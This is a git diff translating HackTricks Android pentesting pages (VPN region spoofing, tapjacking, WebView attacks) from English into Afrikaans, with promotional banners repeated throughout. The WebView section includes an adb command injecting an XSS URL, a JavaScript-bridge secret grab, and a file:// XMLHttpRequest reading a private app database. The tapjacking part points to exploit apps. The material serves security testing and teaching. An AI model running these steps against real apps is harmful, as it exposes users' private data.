-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
-In situations where an application is restricted to certain countries, and you're unable to install it on your Android device due to regional limitations, spoofing your location to a country where the app is available can grant you access. The steps below detail how to do this: +In situasies waar 'n toepassing beperk is tot sekere lande en jy dit nie op jou Android-toestel kan installeer nie as gevolg van streekbeperkings, kan die vervalsing van jou ligging na 'n land waar die toepassing beskikbaar is, jou toegang verleen. Die stappe hieronder beskryf hoe om dit te doen: -1. **Install Hotspot Shield Free VPN Proxy:** - - Begin by downloading and installing the Hotspot Shield Free VPN Proxy from the Google Play Store. +1. **Installeer Hotspot Shield Free VPN Proxy:** +- Begin deur die Hotspot Shield Free VPN Proxy van die Google Play Store af te laai en te installeer. -2. **Connect to a VPN Server:** - - Open the Hotspot Shield application. - - Connect to a VPN server by selecting the country where the application you want to access is available. +2. **Koppel aan 'n VPN-bediener:** +- Maak die Hotspot Shield-toepassing oop. +- Koppel aan 'n VPN-bediener deur die land te kies waar die toepassing wat jy wil toegang tot verkry, beskikbaar is. -3. **Clear Google Play Store Data:** - - Navigate to your device's **Settings**. - - Proceed to **Apps** or **Application Manager** (this may differ depending on your device). - - Find and select **Google Play Store** from the list of apps. - - Tap on **Force Stop** to terminate any running processes of the app. - - Then tap on **Clear Data** or **Clear Storage** (the exact wording may vary) to reset the Google Play Store app to its default state. +3. **Maak Google Play Store-data skoon:** +- Navigeer na jou toestel se **Instellings**. +- Gaan voort na **Toepassings** of **Toepassingsbestuurder** (dit kan verskil afhangende van jou toestel). +- Vind en kies **Google Play Store** uit die lys van toepassings. +- Tik op **Gedwonge Stop** om enige lopende prosesse van die toepassing te beëindig. +- Tik dan op **Data skoonmaak** of **Stoor skoonmaak** (die presiese bewoording kan verskil) om die Google Play Store-toepassing na sy verstektoestand te herstel. -4. **Access the Restricted Application:** - - Open the **Google Play Store**. - - The store should now reflect the content of the country you connected to via the VPN. - - You should be able to search for and install the application that was previously unavailable in your actual location. +4. **Kry toegang tot die beperkte toepassing:** +- Maak die **Google Play Store** oop. +- Die winkel moet nou die inhoud van die land weerspieël waaraan jy gekoppel het via die VPN. +- Jy behoort die toepassing wat voorheen nie beskikbaar was in jou werklike ligging te kan soek en installeer. -### Important Notes: -- The effectiveness of this method can vary based on several factors including the VPN service's reliability and the specific regional restrictions imposed by the app. -- Regularly using a VPN may affect the performance of some apps and services. -- Be aware of the terms of service for any app or service you're using, as using a VPN to bypass regional restrictions may violate those terms. +### Belangrike Notas: +- Die doeltreffendheid van hierdie metode kan wissel op grond van verskeie faktore, insluitend die betroubaarheid van die VPN-diens en die spesifieke streekbeperkings wat deur die toepassing opgelê word. +- Die gereelde gebruik van 'n VPN kan die prestasie van sommige toepassings en dienste beïnvloed. +- Wees bewus van die diensvoorwaardes vir enige toepassing of diens wat jy gebruik, aangesien die gebruik van 'n VPN om streekbeperkings te omseil, hierdie voorwaardes mag oortree. -## References +## Verwysings * [https://manifestsecurity.com/android-application-security-part-23/](https://manifestsecurity.com/android-application-security-part-23/)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
- - diff --git a/mobile-pentesting/android-app-pentesting/tapjacking.md b/mobile-pentesting/android-app-pentesting/tapjacking.md index 46883bf72..e8a9cc9a5 100644 --- a/mobile-pentesting/android-app-pentesting/tapjacking.md +++ b/mobile-pentesting/android-app-pentesting/tapjacking.md @@ -2,88 +2,85 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-## **Basic Information** +## **Basiese Inligting** -**Tapjacking** is an attack where a **malicious** **application** is launched and **positions itself on top of a victim application**. Once it visibly obscures the victim app, its user interface is designed in such a way as to trick the user to interact with it, while it is passing the interaction along to the victim app.\ -In effect, it is **blinding the user from knowing they are actually performing actions on the victim app**. +**Tapjacking** is 'n aanval waar 'n **boosaardige** **toepassing** geloods word en **sigself bo-op 'n slagoffer-toepassing plaas**. Sodra dit die slagoffer-toepassing sigbaar bedek, is sy gebruikerskoppelvlak so ontwerp dat dit die gebruiker mislei om daarmee te interaksieer, terwyl dit die interaksie aan die slagoffer-toepassing deurgee.\ +In werklikheid **verblind dit die gebruiker om te weet dat hulle eintlik handelinge op die slagoffer-toepassing uitvoer**. -### Detection +### Opmerking -In order to detect apps vulnerable to this attacked you should search for **exported activities** in the android manifest (note that an activity with an intent-filter is automatically exported by default). Once you have found the exported activities, **check if they require any permission**. This is because the **malicious application will need that permission also**. +Om toepassings wat vatbaar is vir hierdie aanval op te spoor, moet jy soek na **uitgevoerde aktiwiteite** in die Android-manifes (let daarop dat 'n aktiwiteit met 'n intent-filter outomaties uitgevoer word as gevolg van verstek). Sodra jy die uitgevoerde aktiwiteite gevind het, **kyk of hulle enige toestemming vereis**. Dit is omdat die **boosaardige toepassing ook daardie toestemming sal nodig hê**. -### Protection +### Beskerming -#### Android 12 (API 31,32) and higher +#### Android 12 (API 31,32) en hoër -[**According to this source**](https://www.geeksforgeeks.org/tapjacking-in-android/)**,** tapjacking attacks are automatically prevented by Android from Android 12 (API 31 & 30) and higher. So, even if the application is vulnerable you **won't be able to exploit it**. +[**Volgens hierdie bron**](https://www.geeksforgeeks.org/tapjacking-in-android/)**,** word tapjacking-aanvalle outomaties voorkom deur Android vanaf Android 12 (API 31 & 30) en hoër. So, selfs as die toepassing vatbaar is, **sal jy nie in staat wees om dit uit te buit nie**. #### `filterTouchesWhenObscured` -If **`android:filterTouchesWhenObscured`** is set to **`true`**, the `View` will not receive touches whenever view's window is obscured by another visible window. +As **`android:filterTouchesWhenObscured`** op **`true`** ingestel is, sal die `View` nie aanrakings ontvang wanneer die venster van die weergawe bedek word deur 'n ander sigbare venster nie. #### **`setFilterTouchesWhenObscured`** -The attribute **`setFilterTouchesWhenObscured`** set to true can also prevent the exploitation of this vulnerability if the Android version is lower.\ -If set to **`true`**, for example, a button can be automatically **disabled if it is obscured**: - +Die eienskap **`setFilterTouchesWhenObscured`** wat op true ingestel is, kan ook die uitbuiting van hierdie kwesbaarheid voorkom as die Android-weergawe laer is.\ +As dit op **`true`** ingestel is, kan byvoorbeeld 'n knoppie outomaties **gedeaktiveer word as dit bedek word**: ```xml ``` - -## Exploitation +## Uitbuiting ### Tapjacking-ExportedActivity -The most **recent Android application** performing a Tapjacking attack (+ invoking before an exported activity of the attacked application) can be found in: [**https://github.com/carlospolop/Tapjacking-ExportedActivity**](https://github.com/carlospolop/Tapjacking-ExportedActivity). +Die mees onlangse Android-toepassing wat 'n Tapjacking-aanval uitvoer (+ voor die uitgevoerde aktiwiteit van die aangevalle toepassing roep) kan gevind word by: [**https://github.com/carlospolop/Tapjacking-ExportedActivity**](https://github.com/carlospolop/Tapjacking-ExportedActivity). -Follow the **README instructions to use it**. +Volg die **README-instruksies om dit te gebruik**. ### FloatingWindowApp -An example project implementing **FloatingWindowApp**, which can be used to put on top of other activities to perform a clickjacking attack, can be fund in [**FloatingWindowApp**](https://github.com/aminography/FloatingWindowApp) (a bit old, good luck building the apk). +'n Voorbeeldprojek wat **FloatingWindowApp** implementeer, wat gebruik kan word om bo-op ander aktiwiteite te plaas om 'n clickjacking-aanval uit te voer, kan gevind word by [**FloatingWindowApp**](https://github.com/aminography/FloatingWindowApp) (bietjie oud, sterkte met die bou van die apk). ### Qark {% hint style="danger" %} -It looks like this project is now unmaintained and this functionality isn't properly working anymore +Dit lyk asof hierdie projek nou nie meer onderhou word nie en hierdie funksionaliteit nie meer behoorlik werk nie. {% endhint %} -You can use [**qark**](https://github.com/linkedin/qark) with the `--exploit-apk` --sdk-path `/Users/username/Library/Android/sdk` parameters to create a malicious application to test for possible **Tapjacking** vulnerabilities.\ +Jy kan [**qark**](https://github.com/linkedin/qark) gebruik met die `--exploit-apk` --sdk-path `/Users/username/Library/Android/sdk` parameters om 'n skadelike toepassing te skep om te toets vir moontlike **Tapjacking**-kwesbaarhede. +Die beperking is relatief eenvoudig, aangesien die ontwikkelaar kan kies om nie aanrakinggebeure te ontvang wanneer 'n weergawe deur 'n ander bedek word nie. Gebruik die [Android Developer's Reference](https://developer.android.com/reference/android/view/View#security): -The mitigation is relatively simple as the developer may choose not to receive touch events when a view is covered by another. Using the [Android Developer’s Reference](https://developer.android.com/reference/android/view/View#security): - -> Sometimes it is essential that an application be able to verify that an action is being performed with the full knowledge and consent of the user, such as granting a permission request, making a purchase or clicking on an advertisement. Unfortunately, a malicious application could try to spoof the user into performing these actions, unaware, by concealing the intended purpose of the view. As a remedy, the framework offers a touch filtering mechanism that can be used to improve the security of views that provide access to sensitive functionality. +> Soms is dit noodsaaklik dat 'n toepassing kan verifieer dat 'n aksie met die volle kennis en toestemming van die gebruiker uitgevoer word, soos die verlening van 'n toestemmingsversoek, 'n aankoop doen of op 'n advertensie klik. Ongelukkig kan 'n skadelike toepassing probeer om die gebruiker te mislei om hierdie aksies uit te voer, sonder om bewus te wees daarvan, deur die beoogde doel van die weergawe te verberg. As 'n remedie bied die raamwerk 'n aanrakingsfiltermeganisme wat gebruik kan word om die veiligheid van weergawes wat toegang tot sensitiewe funksionaliteit bied, te verbeter. > -> To enable touch filtering, call [`setFilterTouchesWhenObscured(boolean)`](https://developer.android.com/reference/android/view/View#setFilterTouchesWhenObscured%28boolean%29) or set the android:filterTouchesWhenObscured layout attribute to true. When enabled, the framework will discard touches that are received whenever the view's window is obscured by another visible window. As a result, the view will not receive touches whenever a toast, dialog or other window appears above the view's window. +> Om aanrakingsfiltering te aktiveer, roep [`setFilterTouchesWhenObscured(boolean)`](https://developer.android.com/reference/android/view/View#setFilterTouchesWhenObscured%28boolean%29) aan of stel die android:filterTouchesWhenObscured-uitlegkenmerk in op true. Wanneer dit geaktiveer is, sal die raamwerk aanrakings wat ontvang word, verwerp wanneer die venster van die weergawe bedek word deur 'n ander sigbare venster. As gevolg hiervan sal die weergawe nie aanrakings ontvang wanneer 'n toost, dialoogvenster of ander venster bo die venster van die weergawe verskyn nie.
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
diff --git a/mobile-pentesting/android-app-pentesting/webview-attacks.md b/mobile-pentesting/android-app-pentesting/webview-attacks.md index ad1818e0b..388e6348f 100644 --- a/mobile-pentesting/android-app-pentesting/webview-attacks.md +++ b/mobile-pentesting/android-app-pentesting/webview-attacks.md @@ -1,156 +1,141 @@ -# Webview Attacks +# Webweergawe-aanvalle
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
-## Simplified Guide on WebView Configurations and Security +## Vereenvoudigde Gids oor WebView-konfigurasies en -veiligheid -### Overview of WebView Vulnerabilities +### Oorsig van WebView-gebreklikhede -A critical aspect of Android development involves the correct handling of WebViews. This guide highlights key configurations and security practices to mitigate risks associated with WebView usage. +'n Kritieke aspek van Android-ontwikkeling behels die korrekte hantering van WebViews. Hierdie gids beklemtoon sleutelkonfigurasies en veiligheidspraktyke om risiko's wat verband hou met WebView-gebruik te verminder. -![WebView Example](../../.gitbook/assets/image%20(718).png) +![Voorbeeld van WebView](../../.gitbook/assets/image%20(718).png) -### **File Access in WebViews** +### **Lêertoegang in WebViews** -By default, WebViews permit file access. This functionality is controlled by the `setAllowFileAccess()` method, available since Android API level 3 (Cupcake 1.5). Applications with the **android.permission.READ_EXTERNAL_STORAGE** permission can read files from external storage using a file URL scheme (`file://path/to/file`). +Standaard staan WebViews lêertoegang toe. Hierdie funksionaliteit word beheer deur die `setAllowFileAccess()`-metode, beskikbaar sedert Android API-vlak 3 (Cupcake 1.5). Aansoeke met die **android.permission.READ_EXTERNAL_STORAGE**-toestemming kan lêers van eksterne stoorplek lees deur 'n lêer-URL-skema (`file://path/to/file`) te gebruik. -#### **Deprecated Features: Universal and File Access From URLs** +#### **Verouderde kenmerke: Universele en lêertoegang vanaf URL's** -- **Universal Access From File URLs**: This deprecated feature allowed cross-origin requests from file URLs, posing a significant security risk due to potential XSS attacks. The default setting is disabled (`false`) for apps targeting Android Jelly Bean and newer. - - To check this setting, use `getAllowUniversalAccessFromFileURLs()`. - - To modify this setting, use `setAllowUniversalAccessFromFileURLs(boolean)`. +- **Universele toegang vanaf lêer-URL's**: Hierdie verouderde kenmerk het kruis-oorsprong-versoeke vanaf lêer-URL's toegelaat, wat 'n beduidende veiligheidsrisiko inhou as gevolg van potensiële XSS-aanvalle. Die verstekinstelling is gedeaktiveer (`false`) vir programme wat Android Jelly Bean en nuwer teiken. +- Om hierdie instelling te kontroleer, gebruik `getAllowUniversalAccessFromFileURLs()`. +- Om hierdie instelling te wysig, gebruik `setAllowUniversalAccessFromFileURLs(boolean)`. -- **File Access From File URLs**: This feature, also deprecated, controlled access to content from other file scheme URLs. Like universal access, its default is disabled for enhanced security. - - Use `getAllowFileAccessFromFileURLs()` to check and `setAllowFileAccessFromFileURLs(boolean)` to set. +- **Lêertoegang vanaf lêer-URL's**: Hierdie kenmerk, ook verouderd, beheer toegang tot inhoud vanaf ander lêerskema-URL's. Soos universele toegang, is die verstekinstelling gedeaktiveer vir verbeterde veiligheid. +- Gebruik `getAllowFileAccessFromFileURLs()` om te kontroleer en `setAllowFileAccessFromFileURLs(boolean)` om in te stel. -#### **Secure File Loading** +#### **Veilige lêerlaai** -For disabling file system access while still accessing assets and resources, the `setAllowFileAccess()` method is used. With Android R and above, the default setting is `false`. -- Check with `getAllowFileAccess()`. -- Enable or disable with `setAllowFileAccess(boolean)`. +Vir die deaktivering van lêersisteemtoegang terwyl toegang tot bates en hulpbronne steeds behou word, word die `setAllowFileAccess()`-metode gebruik. Met Android R en hoër is die verstekinstelling `false`. +- Kontroleer met `getAllowFileAccess()`. +- Aktiveer of deaktiveer met `setAllowFileAccess(boolean)`. #### **WebViewAssetLoader** -The **WebViewAssetLoader** class is the modern approach for loading local files. It uses http(s) URLs for accessing local assets and resources, aligning with the Same-Origin policy, thus facilitating CORS management. +Die **WebViewAssetLoader**-klas is die moderne benadering vir die laai van plaaslike lêers. Dit gebruik http(s)-URL's om plaaslike bates en hulpbronne te benader, in lyn met die Same-Origin-beleid, wat CORS-bestuur vergemaklik. -### **JavaScript and Intent Scheme Handling** +### **JavaScript en Intent-skemahandtering** -- **JavaScript**: Disabled by default in WebViews, it can be enabled via `setJavaScriptEnabled()`. Caution is advised as enabling JavaScript without proper safeguards can introduce security vulnerabilities. +- **JavaScript**: Standaard gedeaktiveer in WebViews, dit kan geaktiveer word deur middel van `setJavaScriptEnabled()`. Voorsoorsigtigheid word aanbeveel, aangesien die aktivering van JavaScript sonder behoorlike veiligheidsmaatreëls veiligheidskwessies kan veroorsaak. -- **Intent Scheme**: WebViews can handle the `intent` scheme, potentially leading to exploits if not carefully managed. An example vulnerability involved an exposed WebView parameter "support_url" that could be exploited to execute cross-site scripting (XSS) attacks. +- **Intent-skema**: WebViews kan die `intent`-skema hanteer, wat potensieel kan lei tot uitbuitings as dit nie sorgvuldig bestuur word nie. 'n Voorbeeld van 'n kwesbaarheid het betrekking op 'n blootgestelde WebView-parameter "support_url" wat uitgebuit kon word om kruissite-skripsie (XSS) aanvalle uit te voer. -![Vulnerable WebView](../../.gitbook/assets/image%20(719).png) - -Exploitation example using adb: +![Kwesbare WebView](../../.gitbook/assets/image%20(719).png) +Voorbeeld van uitbuiting met behulp van adb: ```bash adb.exe shell am start -n com.tmh.vulnwebview/.SupportWebView –es support_url "https://example.com/xss.html" ``` +### Javascript-brug -### Javascript Bridge +'n Funksie word deur Android voorsien wat dit moontlik maak vir **JavaScript** in 'n WebView om **nagtiewe Android-app-funksies** aan te roep. Dit word bereik deur die gebruik van die `addJavascriptInterface`-metode, wat JavaScript integreer met nagtiewe Android-funksies, bekend as 'n _WebView JavaScript-brug_. Voorsoorsigtigheid word aanbeveel, aangesien hierdie metode alle bladsye binne die WebView in staat stel om toegang te verkry tot die geregistreerde JavaScript-brugobjek, wat 'n veiligheidsrisiko inhou as sensitiewe inligting deur hierdie brûe blootgestel word. -A feature is provided by Android that enables **JavaScript** in a WebView to invoke **native Android app functions**. This is achieved by utilizing the `addJavascriptInterface` method, which integrates JavaScript with native Android functionalities, termed as a _WebView JavaScript bridge_. Caution is advised as this method allows all pages within the WebView to access the registered JavaScript Interface object, posing a security risk if sensitive information is exposed through these interfaces. +### Belangrike oorwegings -### Important Considerations +- **Uiterste voorsoorsigtigheid is nodig** vir programme wat Android-weergawes onder 4.2 teiken as gevolg van 'n kwesbaarheid wat afstandsbeheer deur middel van skadelike JavaScript moontlik maak deur refleksie te benut. -- **Extreme caution is required** for apps targeting Android versions below 4.2 due to a vulnerability allowing remote code execution through malicious JavaScript, exploiting reflection. - -#### Implementing a JavaScript Bridge - -- **JavaScript interfaces** can interact with native code, as shown in the examples where a class method is exposed to JavaScript: +#### Implementering van 'n JavaScript-brug +- **JavaScript-brûe** kan met nagtiewe kode interaksie hê, soos in die voorbeelde waar 'n klasmetode aan JavaScript blootgestel word: ```javascript @JavascriptInterface public String getSecret() { - return "SuperSecretPassword"; +return "SuperSecretPassword"; }; ``` - -- JavaScript Bridge is enabled by adding an interface to the WebView: - +- JavaScript-brug is geaktiveer deur 'n koppelvlak by die WebView te voeg: ```javascript webView.addJavascriptInterface(new JavascriptBridge(), "javascriptBridge"); webView.reload(); ``` - -- Potential exploitation through JavaScript, for instance, via an XSS attack, enables the calling of exposed Java methods: - +- Potensiële uitbuiting deur middel van JavaScript, byvoorbeeld deur 'n XSS-aanval, maak dit moontlik om blootgestelde Java-metodes aan te roep: ```html ``` +- Om risiko's te verminder, **beperk die gebruik van die JavaScript-brug** tot kode wat saam met die APK versprei word en voorkom die laai van JavaScript vanaf afgeleë bronne. Stel die minimum API-vlak op 17 vir ouer toestelle. -- To mitigate risks, **restrict JavaScript bridge usage** to code shipped with the APK and prevent loading JavaScript from remote sources. For older devices, set the minimum API level to 17. +### Refleksie-gebaseerde afstandsbeheeruitvoering (RCE) -### Reflection-based Remote Code Execution (RCE) +- 'n Gedokumenteerde metode maak dit moontlik om RCE te bereik deur refleksie deur die uitvoering van 'n spesifieke lading. Die `@JavascriptInterface`-annotasie voorkom egter ongemagtigde metode-toegang, wat die aanvalsvlak beperk. -- A documented method allows achieving RCE through reflection by executing a specific payload. However, the `@JavascriptInterface` annotation prevents unauthorized method access, limiting the attack surface. +### Afstandsoplossing -### Remote Debugging +- **Afstandsoplossing** is moontlik met **Chrome Developer Tools**, wat interaksie en willekeurige JavaScript-uitvoering binne die WebView-inhoud moontlik maak. -- **Remote debugging** is possible with **Chrome Developer Tools**, enabling interaction and arbitrary JavaScript execution within the WebView content. - -#### Enabling Remote Debugging - -- Remote debugging can be enabled for all WebViews within an application by: +#### Aktivering van afstandsoplossing +- Afstandsoplossing kan geaktiveer word vir alle WebViews binne 'n toepassing deur: ```java if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.KITKAT) { - WebView.setWebContentsDebuggingEnabled(true); +WebView.setWebContentsDebuggingEnabled(true); } ``` - -- To conditionally enable debugging based on the application's debuggable state: - +- Om voorwaardelik foutopsporing in te skakel gebaseer op die toestand van die toepassing se debuggable eigenschap: ```java if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.KITKAT) { - if (0 != (getApplicationInfo().flags & ApplicationInfo.FLAG_DEBUGGABLE)) - { WebView.setWebContentsDebuggingEnabled(true); } +if (0 != (getApplicationInfo().flags & ApplicationInfo.FLAG_DEBUGGABLE)) +{ WebView.setWebContentsDebuggingEnabled(true); } } ``` +## Uitlek van willekeurige lêers -## Exfiltrate arbitrary files - -- Demonstrates the exfiltration of arbitrary files using an XMLHttpRequest: - +- Toon die uitlek van willekeurige lêers deur gebruik te maak van 'n XMLHttpRequest: ```javascript var xhr = new XMLHttpRequest(); xhr.onreadystatechange = function() { - if (xhr.readyState == XMLHttpRequest.DONE) { - alert(xhr.responseText); - } +if (xhr.readyState == XMLHttpRequest.DONE) { +alert(xhr.responseText); +} } xhr.open('GET', 'file:///data/data/com.authenticationfailure.wheresmybrowser/databases/super_secret.db', true); xhr.send(null); ``` - - -## References +## Verwysings * [https://labs.integrity.pt/articles/review-android-webviews-fileaccess-attack-vectors/index.html](https://labs.integrity.pt/articles/review-android-webviews-fileaccess-attack-vectors/index.html) * [https://github.com/authenticationfailure/WheresMyBrowser.Android](https://github.com/authenticationfailure/WheresMyBrowser.Android) * [https://developer.android.com/reference/android/webkit/WebView](https://developer.android.com/reference/android/webkit/WebView)
